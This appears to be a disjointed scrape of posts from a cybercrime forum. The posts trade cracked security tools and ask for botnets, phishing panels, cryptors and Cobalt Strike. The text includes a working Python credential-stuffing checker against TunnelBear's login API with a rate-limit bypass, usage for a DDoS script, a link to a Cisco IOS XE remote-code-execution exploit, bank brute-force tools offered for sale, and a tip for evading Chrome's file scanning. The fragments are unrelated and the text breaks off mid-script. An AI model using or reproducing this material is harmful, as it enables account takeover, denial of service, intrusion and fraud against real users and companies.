![Rebuilt Desktops- icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease- notes%2Faxiom%2Ficons%2FRebuilt%2520Desktops.png&hash=4eb2f953a328da502e6ffaca95f59a46) Rebuilt Desktops
If your organization has a Magnet REVIEW server, you can now integrate Magnet AXIOM with Magnet REVIEW for a streamlined upload experience.
When loading a GrayKey iOS image manually or by using the Connect to GrayKey
workflow, you now have the option of adding a keychain file to decrypt the
data.
Including the keychain allows AXIOM to attempt to automatically decrypt some
mobile artifacts, leading to more evidence in your case data.
After acquiring an Android image using GrayKey, you can now connect directly
to the GrayKey box from AXIOM and copy the device data to your AXIOM
workstation for processing.
This workflow eliminates the need to manually download the files from GrayKey
prior to loading the image into AXIOM.
-WwW.Dr-FarFar.CoM.zip**
Source : [Dr.FarFar](https://www.dr-farfar.com/magnet-axiom-forensics- premium/)
Здравствуйте
Нужен направленный словарь для брутфорса ( Имеется 20 слов / макс длина 10 букв )
Кто чем пользуется ?
P.S Сrunch отлетает
P.S Нужен софт
JEB Decompiler 5.5.0.202311022109 mod by CXV
Spoiler: Download
![drive.proton.me](/proxy.php?image=https%3A%2F%2Fdrive.proton.me%2Fassets%2Fproton- og-image.png&hash=85ba433ce54e51c76d092bbfad9b2662&return_error=1)
Proton Drive allows you to securely store and share your sensitive documents and access them anywhere.
drive.proton.me
Requirements: JDK (ONLY 17.0.X or above, 64-bit OS)
Mod info(changes):
- fix all integrity checks\timebomb
- Time-limited sessions fixed
- Requires an Internet connection fixed
- dexdec: fix string decrypt via emulation
- dexdec: instruction conversion recovered
- gui: Usage of the clipboard is disallowed fixed
- jdb2: Saving or loading projects is disabled fixed
- android debug enabled
- android native debug enabled
- avrdec: decompiler enabled
- Decompiler exporter fixed
- CF-unflattener, unvirtualizer, native emulator, and plugins fixed
- callgraph enabled
-mod by: CXVUSER
Может кто нибудь дать ссылку на cobalt, уже скомпилированный, желательно с инструкцией по установке?
ARTToolkit
Если вам не нравится постоянный поиск нужной команды в среде Windows, Linux или Active Directory, то этот проект поможет облегчить эту задачу. Просто выберите имеющуюся у вас информацию о машине-жертве (пароли, имена пользователей, службы и т.д.), и на экране появится список инструментов, которые вы можете опробовать на этой машине, а также шаблонная команда, которую можно легко скопировать и вставить.
Фантастический список наступательных инструментов безопасности и связанных с ними полезных команд/загрузок для "красных" машин. Инструмент ARTToolkit может помочь охотникам за угрозами смоделировать различные сценарии атак, протестировать уязвимости и оценить потенциальные риски в среде.
arttoolkit.github.io
Hey brothers,
I ordered a config, but unfortunately the author has been offline for weeks, and I claim that he won't be coming online anymore. However, the config is not working anymore because I need to exchange the token. My stupid question is, where should I get it from?
Нашел этот полезный инструмент для брутфорса. Есть ли у кого-нибудь опыт использования этого инструмента? Порекомендуете другие подобные инструменты? Заранее спасибо.
Всем привет
Интересует модуль проверки оплаты как стоит на почти всех криптовалютных
обменниках, у которых предусмотрена автоматическая сделка с клиентом, т.е. без
ручного управления со стороны обменника
Необходимо подобное решение
Это софт который проверяет поступление средств со стороны клиента и по факту
их зачисления на кошелёк подтверждает оплату и переводит клиенту запрошенную
им валюту(биток,Киви,эфир итд)
Т.е. софт фиксирует заявку: например, человек хочет купить 1 эфир за биток,
сервис сверяясь с курсом эфира к битку, говорит "переведите 0.07 битка на
такой-то кошелёк" и ждёт пока 0.07 поступит на кошелёк, и если оплата пришла,
то отправляет эфир на указанный кошелёк клиенту
Я так понимаю софт как-то работает с графикой, т.к. в связке обмена битка на
эфир(и других) не существует никаких апи, которые есть у платёжных систем и
решают этот вопрос.
Ищу решение или такой софт.
Важно, чтобы можно было подгонять софт под нужные кошельки
Интересны ваши мысли по реализации такого софта
Does anyone have VMprotect, the most up-to-date version of it, I've looked a lot and can't find it anywhere.
Hidden content for authorized users.
](https://gitlab.com/l0phtcrack/l0phtcrack/-/releases)
L0phtCrack Password Auditor
gitlab.com
X-Ways Forensics v20.3 SR-4 带插件 x64 offer by Fletime
Looking for Targeted USA Match Dating Logz Male Ages 69-75 years
Download:
Code:Copy to clipboard
https://send.exploit.in/download/424bd8f058e32939/#7ccmDSQHB5zuWCjBQlDBgQ
https://download.ru/files/hMjrNvOR
Key:
Code:Copy to clipboard
a56bbd58dfe63bfdfc9b6518561eae4c8025d0f5
https://www.sendspace.com/file/cmo0x1
Code:Copy to clipboard
<a class="btn btn-buy-d2t класс вызова" href="#">Claim Airdrop Now!</a>
Hidden content for authorized users.
![decrypto.site](/proxy.php?image=https%3A%2F%2Fdecrypto.site%2Fassets%2Ffavicons%2Fandroid- icon-192x192.png&hash=f031e898fb45f2390a21862d0f8fd330&return_error=1) decrypto.site
Доброго времени суток. Надеюсь пост не нарушиает правила сообщества и авторское право.
Для тех кому было интересно как устроен не без известный zoominfo parser.
(https://xss.is/threads/51807/)
Выкладываю неотформатированную версию исходников. Сбилдить, модернизировать и
т.д., думаю, сможет каждый)
Engine) source code ](https://github.com/tigerw00d/Zoominfo)
Zoominfo Parser (Darkmoon Bruteforce Engine) source code - GitHub - tigerw00d/Zoominfo: Zoominfo Parser (Darkmoon Bruteforce Engine) source code
github.com
Если у вас в наличии нет вольшого количества качественных прокси, то накидал
простейший сборщик линков на питоне.
Это версия под Windows, но не сложно переделать под другие платформы.
Необходимо наличие Tor-браузера для избежания блокировки адреса
поисковиком(смотрите исходники).
Сканер не быстрый, но поставленные цели выполняет.
](https://github.com/tigerw00d/ZoominfoPy)
Contribute to tigerw00d/ZoominfoPy development by creating an account on GitHub.
github.com
Usage: python3 check_zoom.py dns.txt index
dns.txt - файл с dns именами
index - номер строки в dns.txt с которой начинается проверка
Код для личного пользования, не судите строго)
Hi бандиты, у кого есть этот софт или что-то на подобии этого ?
Есть ли актуальный спамер по существующим группам и контактам. Если да скиньте ссылки на исходинк/программу
Looking for good binder.
Can be simple.
Don't send this: https://github.com/UnamSanctam/UnamBinder
Its don't working with my payload
Я в этой теме совсем далек, но сейчас возникла личная причина поиска.... вот
мне интересно стало.
Сегодня целый день активно штудирую сеть по данной теме....
Толком ничего нет... перепробывал с 10 скриптов, ковырял скрипты, ковырял
запросы.... Как то всё не работает ....
Что сейчас в данной теме? Какие варианты?
Платные сервисы, это кончено хорошо, но не вариант....
Куплю софт для минта NFT на разных платформах Solana/OpenSea прочее.
Так как пресейлы NFT происходят на платформах за 1 и менее секунды, приобрету
софт за хорошие деньги. Python/Javascript. Только Гарант.
Софтом для Binance уже владею но рассмотрю так же ваши предложения. Согласен
на долгосрочное сотрудничество + % от сделок.
Вопросы и предложения в тг: @kushirchik
Hello can anyone link me to a live panel phish page script ? like u-admin
IMPROVEMENTS
- Improved the Late-Confirmation Storage Mechanism to lower disc usage.
- Improved the Links/API definition to add links with a single click.
- Added the Block navigation on SPAs to built-in scan policies.
- Improved the scan agent to continue scanning in case of getting HTTP status
errors like Forbidden, Unauthorized, and ProxyAuthenticationRequired for
websites supporting TLS 1.3.
FIXES
- Fixed the issue that does not terminate the Chromium instances although the
max scan duration is exceeded.
- Fixed the issue that automatically enables “Exclude Authentication Pages”
after enabling form authentication.
- Fixed the bug that throws null reference exception at the link pool.
- Fixed the bug that prevents GraphQL Endpoint detection when the scan policy
is copied.
- Fixed the bug that resulted in running many Chromium instances when a new
scan is started.
- Fixed a null reference error when a new scan is started via the command
line.
DOWNLOAD
https://mega.nz/file/ixcDQLrK#NBDsEs0Kf-1-tFOhIVjM2Pv0CaIkduXVo_54cdVA6bY
MIRROR
https://anonfiles.com/X2Zb54z4yd/Invicti-Standard-6.6.1.36926_zip
PWD: h0nus-reign
Author: h0nus
Есть ли сейчас актуальные софты?
Или способы накрутки через Youtube advert
Всем привет, форумчане! Может кто скинуть рабочую версию окуня с лицухой для винды?. Желательно с маном внутри
На просторах гитхаба нашел интересного бота для телеграм, работающего с популярными нейросетями. На одном из форумов выкладывают это чудо под платный хайд. Возможно кому будет интересно.
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2Fcd179f5c1db7e91b159a20eeb94afc5288d55e2136b7551e61284f8548ba2f44%2Fvladislav- bordiug%2FChatGPT_DALL_E_StableDiffusion_Telegram_Bot&hash=96e80af8eff2b472daa835c64fef6fc2&return_error=1)
This is ChatGPT, DALL·E, Stable Diffusion python-telegram-bot with cryptocurrency payments. It allows you to generate images and chat with ChatGPT. ](https://github.com/vladislav- bordiug/ChatGPT_DALL_E_StableDiffusion_Telegram_Bot)
This is ChatGPT, DALL·E, Stable Diffusion python-telegram-bot with cryptocurrency payments. It allows you to generate images and chat with ChatGPT. - GitHub - vladislav-bordiug/ChatGPT_DALL_E_Stab...
github.com
Скачивание вашего файла при нажатии "Free Download".
Сделал работу вперед человеку под инсталлы, тот в итоге слился, собственно
кому надо берите.
Hello everyone,
the other day I needed software to increase his weight.
I was too lazy to write my own (although you can write one in 2 minutes). In
any case, there is such software as FnByteAdder, I decided to upload it here
because people who need it may appear. What for? Well, the very first thing
that comes to mind is bypassing the Google Chrome protection for viruses.
Google Chrome doesn't scan files above 300mb, such software can also be put in
a .zip archive and its weight will be 1mb. Below is a demo of his work.
I advise you to use the indication of weight in kilobytes.
Hope I helped someone.
Привет, я ищу MD-Next Forensic + MD-Next Live и может обменять Cellebrite
UFED, Cellebrite Physical Analyzer, Cellebrite Pathfinder, Elcomsoft iOS
forensic toolkit, Magnet Axiom, или Griffeye Analyze. Если он у вас есть,
отправьте мне PM.
Hello, I'm looking for MD-Next Forensic + MD-Next Live and can trade you
Cellebrite UFED, Cellebrite Physical Analyzer, Cellebrite Pathfinder,
Elcomsoft iOS forensic toolkit, Magnet Axiom, or Griffeye Analyze for it, If
you have it, send me a PM so we can negotiate.
взято за бугром ===> fssquad.com
NOBUX.SK FULL SHOP TEMPLATE, CLONED!
NOTE : NO SERVER SIDED FILES!
USE IT FOR YOUR PROJECTS :]
DOWNLOAD LINKS
You must have at least 5 reaction(s) to view the content.
Software License: Pro Unlimited Edition
Version: 1.0.6
Filename : WingMan XSS Vulnerability Scanner Advanced v1.0.6 Full
Activated.zip
Size : 8.4 MB
https://www.up-4ever.net/s9huqwnrymvi
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F6a0326a7c643668e4b86e32bbb4e695481fb01668ce5b5dcd9e13f59cc6b46cb%2Fqtc- de%2Fwebshell-cli&hash=df0059fce8df16fc7e55c020556a3940&return_error=1)
webshells ](https://github.com/qtc-de/webshell-cli)
A simple command line interface for webshells. Contribute to qtc-de/webshell- cli development by creating an account on GitHub.
github.com
нужен похожий софт который будет собирать базы данных по интернету
Из блека ReSources.
Фейк на БА с отсутком данных в телеграм
Друзья ищу ботнет АТРАКС, готов заплатить норм, плиз отпишите в ЛС или телегу @mrf3y
Activated.jpg](https://xss.is/attachments/30420/)
это чрезвычайно универсальный инструмент сетевого мониторинга для Windows
X-NetStat - это универсальный инструмент сетевого мониторинга для Windows.
Он развивается с 1998 года.
Подробная информация о соединениях TCP / IP
Нижняя панель обеспечивает доступ к соединению, процессу, порту, WHOIS и
системной информации.
На вкладке «Информация о соединении» представлена доступная информация о TCP- соединении.
Подробная информация о процессе
X-NetStat показывает приложения, которые обрабатывают трафик TCP и UDP. На
вкладке «Информация о процессе» отображаются основные сведения о процессе,
включая информацию о встроенной версии, хэш-информацию MD5 и наличие у файла
цифровой подписи.
Вы также можете запустить Process Explorer с помощью SysInternals из X-NetStat, чтобы отобразить чрезвычайно подробную информацию.
Осведомленность о местонахождении
Новое в X-NetStat 6 - это географическая осведомленность и панель
«Местоположение». Он может показать вам приблизительное местоположение
удаленного хоста, включая количество переходов и скорость линии.
Вы также можете использовать местоположение страны в качестве условия в правиле, а также классифицировать страны как «безопасные», «нейтральные» или «опасные», чтобы раскрасить их в таблице подключений.
Осведомленность об адресах
X-NetStat 6 теперь имеет лучшую интеграцию с реестрами IP-адресов, такими как
ARIN и RIPE. Вы можете получить эту информацию в реальном времени с помощью
агента или найти ее вручную.
Вкладка Netblock показывает владельца выбранного IP-адреса и любую информацию о нем, которую можно найти в Википедии.
Браузер WHOIS
Встроенный браузер WHOIS можно использовать для ручного поиска записей IP-
адресов и доменных имен. Запросы автоматически направляются на соответствующий
сервер WHOIS.
Системная информация
На панели «Информация о системе» отображается информация о вашем компьютере,
вашей локальной сети, вашем интернет-провайдере и информация о сеансе
X-NetStat.
Установите правила для запуска действий
XNS может реагировать на определенные условия подключения / сети с помощью
встроенной системы правил. Введите условия для запуска одного или нескольких
действий, например:
Всплывающее сообщение с предупреждением
Доступ к URL-адресу обратного вызова / веб-сервису
Запустить EXE-файл или скрипт
Автоматически убивать соединение
Отправить электронное письмо или текстовое сообщение
Оповещение, инициированное правилом
Пример оповещения о сообщении из сработавшего правила.
Все в контексте
Доступ к функциям и командам программы в контексте любого подключения. Просто
щелкните правой кнопкой мыши.
Погрузитесь в сетевую статистику
Поднимите жизненно важные показатели для ваших сетевых карт, включая
статистику для протоколов IP, ICMP, TCP / IP и UDP.
Лицензия на программное обеспечение: Technicians
Версия: 6.0.0.31
Цена: $ 49.95
Скидка: 100% OFF
Имя файла: X-NetStat Technicians v6.0.0.23 Full Activated -WwW.Dr-FarFar.CoM.zip
Размер: 80 МБ
Уникальная возможность всем любителям AI изучить "боевую" AI топ приложение
AppStore и Google Play 2021 года. Всего около 464гб данных.
И так, первая часть: https://anonfiles.com/i0Q8veh9z2/body_tune_zip
MobaXterm Professional has been designed for security and stability
MobaXterm provides all the important remote network tools (SSH, X11, RDP, VNC, FTP, MOSH, ...) and Unix commands (bash, ls, cat, sed, grep, awk, rsync, ...) to Windows desktop, in a single portable exe file which works out of the box
Download
DL Link - <https://mega.nz/file/YJ1FVYTT#vKCu_ONiDN_kLKIu- ZirH6naU4_7_X67DvEOxhsyAlc>
VT Scan - https://www.virustotal.com/gui/file/518a065b4f33c233b00823e9f429d63931c5067e15f3c4e880435351c505e6c5
Click to expand...
Всем привет!) Нужна ваша помощь или напуствие. Недавно удалил всё с телефоноа сяоми редми9, включая фото и прочее, на телефоне не было никаких синхронизаций с гуглом и прочими облачными и т.п. Хотел решить проьлему сам но застопорился на получении рут прав и не потому что я криворукий, а потому что некоторые источники говорят, что для получения рут прав на данном смарфтоне нужно ставить кастомный рекавери и т.п. НО(!) это вроде как исключает возможность восстановления файлов из недр памяти устройства, логика такова ставишь кастом (по сути тот же джейлбрейк) и все данные сносятся, но вроде как в будущем таких проблем не возникнет.
Может у кого есть какой инструмент для восстановления данных? Подскажете, я правильно понимаю что если я крякну телефон (с полуяблока в флешку), то я всё равно не смогу восстановить удаленные файлы? В общем буду очень благодарен если подскажите как мне решить эту проблему. Заранее спасибо)
Всех приветствую. Загорелся желанием сделать криптовалютный кошелек. Многие популярные кошельки сейчас юзерврендли, тобиш они для масс, для обычных пользователей, а я хочу сделать девелоперфрендли кошелек, с обширным функционалом, хотел по спросить, а может есть уже такие кошельки и не стоит игра свечь? мой кошелек будет ни капли про защиту и т.д, просто в нем будет много функций, для тестов каких либо он будет очень хорошо подходите, что думаете? есть такие кошельки?
Доброго времени суток. Хотел бы разобраться в устройстве децентрализованного чат-приложения(интересует модель "и клиент и сервер"), обходом NAT и прочих штук, связанных с одноранговыми сетями. Может есть у кого исходники "скелета" подобного приложения? ЯП желательно C-подобный, но в принципе любой пойдёт.
Hi xss community,
I am desparately looking for a cracked version of MailerQ. For those who don't know mailerQ:
It's one of the most powerful MTA's for bulk SMTP mailing. Many email platforms work with it.
I throw a bottle in an ocean so maybe somebody from the community can help.
P.S: I have all the powerMTA versions since it's creation, so maybe we can exchange
P.S.2: I am open to xss escrow if there is somebody suggests this for money
Bests,
MobaXterm Professional Edition 21.3
Download - https://mega.nz/file/1EpWSTYA#Yons6MZVfuQl6I0IFyijyw0IwfIsVCUNw9SuCoiEn5E
VirusTotal - https://www.virustotal.com/gui/file...1562eaae95fb7007254a7f6d852e66310ae/detection
на склейку не проверял
Download: https://ponies.cloud/exploitation/Core-Impact-21.5-Pwn3rzs.7z
Password: Pwn3rzs
https://www.graphmessenger.com/
Софт для изменения голоса при обмене звуковыми сообщениями или же звонках в
телеграмме.
Для этой задачи отлично подойдёт приложение Graph Messenger.
• Устанавливаем Graph Messenger и проходим авторизацию через аккаунт.
• Ставим нужный пресет и все готово.
• После этого в любом диалоге нажимайте на три точки в самом верху, переходите
во вкладку Voice Changer.
Core Impact 20.3+Crack+Update
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/AII3gJzB#AzWMYsz4-BfEqc5Xi0YDzbWdGwn-GK9J88E5ydQUAGw)
mega.nz
SMSBotBypass : (OTP BOT) Bypass SMS verifications from Paypal, Instagram, Snapchat, Google, 3D Secure, and many others... - Ross1337/SMSBotBypass
github.com
Репо заблочен, у кого есть исходники?
What is the name of this software for managing csv files?
![](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FdXRLoSLrR58QfSXjT9xPjeSk95quLAwPR3QaGYIbs7OXNGcg3UNijZErvi9qZAX4zF25BoYjGCVzK9ic85YOWPrQXuN7qZKEze314nQlHzDitNFGdS0jdhJeNV3IwJvfu7am_VH4EqzzSPSGvUNaE91CkDHZdyht_188t3kYDfLtJrFwRmTT6cSEqCoRAGTfDCICASrrcQkqVCjiqzfP2PJ14hQpSSmeSRPBOdJSyXzguFoTGh-9Z6dlkHgZo8bK2tYb6_hG- XPJnVD2ri_2rkbEgTKmfGXSdU8kZAdvTvxLjWS5PmwTIYcDsXceME-45dTAQMu_gDt6-mcUJlV3QQ.jpg&hash=42abb47712199cdd30ed13fb7de5f646)
I saw this program on a Telegram channel
lost good friend who used to be good cracker, his telegram was K1l1manjaro, can't find him anymore.
download
hoepfully someone else can.
"HCLTech AppScan Standard is a Dynamic Analysis testing tool designed for security experts and pen-testers to use when performing security tests on web applications and web services. It runs automatic scans that explore and test web applications, and includes one of the most powerful scanning engines in the world."
«HCLTech AppScan Standard — это инструмент тестирования динамического анализа, разработанный экспертами по безопасности и пен-тестерами для использования при тестировании безопасности веб-приложений и веб-служб»
Software License : Professional Edition
Version : 24.4.0.44170
Filename : Invicti Professional Edition v24.4.0.44170 Full Activated.zip
Size : 254.9 MB
https://www.up-4ever.net/46j9fy6eocdy
Поможете найти название программы? С помошью программы можно было анализировать сайт, если же что-то находило слитое то перейдя в репозиторий можно было скачать сам файл с базой данных. Буду очень благодарен если поможете найти название программы.
добрый день. Кто может скиньте кряк luxury cryptor как можно новой версии
Собственно в теме описана суть вопроса ищу оригинальный фаил последнего Shellter Pro не кряк без лицухиипросто фаил если укоготесть и не жалко киньте в ЛС я поделюсь потом отвязаным .
Решил слить вам торгового робота MQL4. Может кому то понадобится, довольно умный и практичный, но не идеальный)
Основной алгоритм работы базируется на двух методах-индикаторах Envelopes and ZigZag. Данные индикаторы просты и уже встроены и реализованы через API терминала MT4.
Что может торгаш наш:
Советы по применению. Все просто, открываете ваш терминал MT4, вкладку советники и загружаете его на панель. Потом перетаскиваете на тот инструмент, на котором будете ввести торги. Весь код открыт, можете посмотреть без лишних «закладок внутри». Тестировался как на реальных данных, так и исторических. Для пущего эффекта:
При данных настройках % выигрышных сделок составит 60-40. Если посидеть и
поиграться, можно поднять уровень захода к 71-29. Лучше всего работает на
форекс, крипте.
Простой генератор пассов.
workupload.com ](https://workupload.com/file/yB8HeeAWbhr)
Download az generator.zip (49.87 KB) now. Fast and easy at workupload.com
workupload.com
pass : exploit
Что-то не получается поднять, раньше такой ошибки не вылазило
Code:Copy to clipboard
Uncaught exception
Traceback (most recent call last):
File "/usr/local/lib/python3.10/dist-packages/tornado/http1connection.py", line 276, in _read_message
delegate.finish()
File "/usr/local/lib/python3.10/dist-packages/tornado/routing.py", line 268, in finish
self.delegate.finish()
File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 2395, in finish
self.execute()
File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 2417, in execute
self.handler = self.handler_class(
File "/root/RedWarden/lib/proxyhandler.py", line 81, in __init__
self.server_address, self.all_server_addresses = ProxyRequestHandler.get_ip()
File "/root/RedWarden/lib/proxyhandler.py", line 98, in get_ip
all_addresses = sorted([f[4][0] for f in socket.getaddrinfo(socket.gethostname(), None)] + ['127.0.0.1'])
File "/usr/lib/python3.10/socket.py", line 955, in getaddrinfo
for res in _socket.getaddrinfo(host, port, family, type, proto, flags):
socket.gaierror: [Errno -5] No address associated with hostname
Мб кто нашел решение...
Продвинутый буфер обмена
Clipdiary — умный аналог стандартного буфера обмена в Windows. Можно хранить
до 50 тысяч записей в папке буфера. Сюда входят изображения, документы,
ссылки, текст и PDF файлы. Обратите внимание на комбинации горячих клавиш в
разделе "Справка".
Поддерживает шифрование данных по алгоритму AES-256.
You must have at least 1 reaction(s) to view the content.
I need someone to install Deepfake live on my AMD pc ill pay
Ребят есть у кого VidIQ нужен очень рабочий
Приветствую, необходима коба версии 4.0, приоритет сурсы с кряком.
нужен софт который под аккаунтом домен админа, будет дампать почту конкретного одного или же всех почтовых ящиков, исходящие + входящие письма, и сохранял все в текстовик\таблицу
есть ли в паблике похожий софт? спасибо.
Привет , может у кого то завалялись исходники мериса , или ботнета который ддосит тор
Download Here
VirusTotal
](https://www.virustotal.com/gui/file/73d96b1535d6fb91c1f27fb6e6697b8003b15f88662522e8f336566d5ecda629)
VirusTotal
www.virustotal.com
Password Unrar is 1
нужен ченджер, киньте ссылку где скачать пожалуйста
Установка:
Installing NODEJS 18:
curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.5/install.sh | bash
source ~/.bashrc
nvm --version
nvm install v18
Installing modules:
apt install npm -y
npm i colors
npm i cheerio
npm i set-cookie-parser
npm i hpack
npm i crypton
npm i cluster
npm i commander
npm i tls
npm i http2
npm i color
npm i util
npm i request
npm i v8
Использование:
node COOKIE.js target time threads rate proxy.txt
target - цель
time - время атаки
threads - потоки
rate -
Many options: --debug, --redirect, --ratelimit, --query --emulate --randrate
--filter --reset --tls --geo
--debug 1/2
--redirect true/false
--query 1/2 (1 - ?q=wsqd / 2 - ?wsqd)
--emulate true/false
--randrate true/false
--filter true/false
--reset true/false
--tls 1/2/3 (tlsv1/ tlsv2/tlsv3)
--geo US/CN/RU and others
Download - https://files.fm/u/ckgd35ybgx
Developed for BAS - Bablosoft.com
Bruteforce Commbank with a combolist
You must have at least 5 reaction(s) to view the content.
Софт своеобразный и слегка нетрадиционный, но рабочий, для работы нужно
рандомизировать свои ссылки чтоб были разные адреса в каждом отправляемом
посте, при этом блокировка минимизируется или полностью отсутствует по словам
разрабов, без привязки и это радует, внутри видеокурс как юзать, НЕ РЕКЛАМА**
**
Скачать **
VirusTotal
Hello, I need help, I'm doing RDP brute force and I wanted someone to tell me
what port, other than port 3389,
RDP servers usually use, let's say residential ones. tanks!
Есть данный hvnc, который увидел на соседнем борде (exploit), как объяснил
модератор exploit, то 90% людей, которые делают, после продают hvnc, то берут
этот код, обновив его и сделав лучше экономя деньги/время/нервы.
Я бы хотел доработать/сделать/найти кодера/, который возьмётся за работу его и
доделает до нашего время, которое актуально. Хотелось бы с помощью его полить,
но не уверен, что будет что-то, а конкретнее мне нужны запросы, как USA BA,
если в переводе, то Банки США, но не уверен, что данный HVNC вообще потянет.
Стоит ли искать кодера, который доделает его в лучшем виде?. Просто, как понял
люди, которые держут логоводов, то используют данный HVNC, но переделанный.
Ссылка на сам HVNC: https://github.com/Cc28256/HVNC
Предупреждаю, если вы боитесь, то лучше запустите на дедике
Взял с соседнего чата не знаю чистый нет , если укогонибудь есть установщик v
2 окуня 360 поделитесь в ЛС .
Если кому нужна версия 1.7 пишите скину .
Всем привет, ищу кодера для создания мерча для обработки RU логов.
Связь ТГ.
have someone a linux license for SoftPerfect Network Scanner
the windows license dont work
Парни подскажите пжл RDP client с нормальным уровнем безопасности ,open source для MAC OS ,что типо как reminna для Linux
Продам разово личный ( не паблик ) софт Брут/Чекер БА для Commonwealth Bank of Australia, так же свои конфиги для работы с паблик софтом и другой дополнительный материал.
Причина продажи: занимаюсь другой сферой деятельности, все вышеперечисленное мною уже не используется.
Продажа через Гаранта форума.
За подробностями, пожалуйста, в ЛС.
Admin please move this thread in correct section (i couldn't find any better
place)
So, today i found tunnelbear 15k accounts which got leaked back in june or
jule, so it kinda inspired me to write checker, but the problem was, there is
rate limit how many accounts can you try per minute
so as i found out, rate limit was somewhere like 6-10 attempts per minute,
which is not cool, we don't want to run checker for years right?
using proxy? nah, too slow, we need something better, and idea was born ?
**all you need to do is to find one account manually which is valid from the list, and once you have it, download VPN and turn that on
misconfiguration in their servers allows you to attempt login as many times as you want, idk why this happens, probably because vpn servers are considered as their servers but the filter can't tell difference if it's microservice from project or server from vpn (i guess), anyway we do not care about that, we're happy that they have issue, so we can check accounts**
Here's code i wrote for checking
Python:Copy to clipboard
import requests
from random import randint
from time import sleep as s
import json
from multiprocessing import Pool
def check(account):
username = account[0]
password = account[1]
ua_list = ["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763",
"Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36",
"Mozilla/5.0 (Linux; Android 11; SM-A426U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 Mobile Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.3229.169 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.1329.192 Safari/537.36"]
url = "https://prod-api-core.tunnelbear.com/core/web/api/login"
data = f'username={username}&password={password}&withUserDetails=true&v=web-1.0"'
headers = {"authority": "prod-api-core.tunnelbear.com",
"content-type": "application/x-www-form-urlencoded",
"accept":"application/json, text/plain, */*",
"user-agent": ua_list[randint(0,len(ua_list)-1)]} # Random UA
try:
response = requests.post(url=url, data=data, headers=headers)
code = response.status_code
body = response.text
if code == 200:
user_data = json.loads(body)
acc_type = user_data['details']['bearType']
balance = str(float(user_data['details']['dataCap']) / 1024 / 1024) + " MB" # Bytes To MB
checked = open('result.txt', "a") # PY 3 doesn't lock files, so why not
checked.write(f'{username}:{password} {balance} {acc_type}\n')
checked.close()
else:
pass
except:
print("[#] - Connection issue, check VPN and connection")
if __name__ == '__main__':
f = open("accounts.txt", "r", encoding="UTF-8")
content = f.read().split("\n")
f.close()
accounts = []
for line in content:
if len(line) > 25:
uname_pass = line.split("|")[0]
accounts.append(uname_pass.strip().split(":"))
with Pool(50) as p: # BECAUSE I CAN
p.map(check, accounts)
checked.close()
(if you'll see connection warning too often, try to lower the threads from 50 to 25 for example)
After few seconds you'll have +100 accounts, in attachments you can find accounts list (Unchecked)
First 400 Checked accounts: https://xss.is/threads/58965/
Enjoy
Exploit https://xss.is/threads/106336/#post-742866
Unauthenticated Cisco CVE-2023-20198 & CVE-2023-20273 exploit, written in python. NVE describe this particular cve vulnerability as authenticated, but this one exploit will succesfull execute without any auth so it is an unauthenticated RCE. Can be used for standalone and unauthenticated Cisco devices.
Click to expand...
![gofile.io](/proxy.php?image=https%3A%2F%2Fgofile.io%2Fdist%2Fimg%2Flogo- small-og.png&hash=32429581fada6ae1887e27dfa99f76aa&return_error=1)
](https://gofile.io/d/riXoGN)
Gofile is a free, secure file sharing and storage platform. With unlimited bandwidth and storage, you can easily store and share files of any type without any limits. Our advanced features, such as CDN support and password protection, make Gofile the ideal choice for individuals and businesses...
gofile.io
Плиз, дайте инсталятор Cortex XDR, желательно последний.
Hidden content for authorized users.
Symantec Endpoint Protection
Symantec Endpoint Protection (SEP) delivers superior, multilayer protection to stop threats regardless of how they attack your endpoints. SEP integrates with existing security infrastructure to provide orchestrated responses to address threats quickly.
Features of Symantec Endpoint Protection
Download
Rich (BB code):Copy to clipboard
DL Link - https://mega.nz/file/xI93WIJI#7uO3xKCH3I0L72vo7r2OsM-KPSG4Xa4GEUeN_TUX2aw
VT Link - https://www.virustotal.com/gui/file/636e83afc917dac6197719ed3be5e526612992cb66f600acdc4d2aa1d2da6139
сам бюрп - https://gofile.io/d/EffqEW
и кряк - https://gofile.io/d/JwhJKd
Shadow Dumper is a powerful tool used to dump LSASS memory, often needed in penetration testing and red teaming. It uses multiple advanced techniques to dump memory, allowing to access sensitive data in LSASS memory.
Ищу апп только с исходным кодом.
Интересуют криптокошельки по большей части, но рассмотрю и другие офферы.
Работа только через гарант
FREE Email Utilita - взято с открытых источников, было залито октябрь 2021
Для работы с базами имейлов
На сайте из выдачи кнопка скачать у меня не работает
Всем доброго времени суток.
Ищу софт для теста потока сетевого трафика между двумя узлами, со скоростью не
ниже 1Гб/сек ......, желательно на винде..., генератор - приемник.
Статистика полученных и потерянных пакетов.....
Часто вижу что люди до сих пор спрашивают как импоритить много таргетов в акунетикс, максимально простой скрипт на питоне который создаст для вас файл в идеальном для окуня формате
Python:Copy to clipboard
import csv
from urllib.parse import urlparse
def is_valid_url(url):
parsed_url = urlparse(url)
return bool(parsed_url.scheme and parsed_url.netloc)
def process_urls(input_file, output_file, text):
with open(input_file, 'r') as file:
urls = file.read().splitlines()
valid_urls = [url for url in urls if is_valid_url(url)]
data = []
for url in valid_urls:
parsed_url = urlparse(url)
formatted_url = f"{parsed_url.scheme}://{parsed_url.netloc}"
